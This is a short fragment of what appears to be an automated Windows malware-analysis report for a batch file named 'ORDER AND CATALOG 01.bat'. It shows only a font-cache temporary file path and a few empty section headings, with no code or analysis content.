C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Static File Info

General

File Icon

Windows Analysis Report
ORDER AND CATALOG 01.bat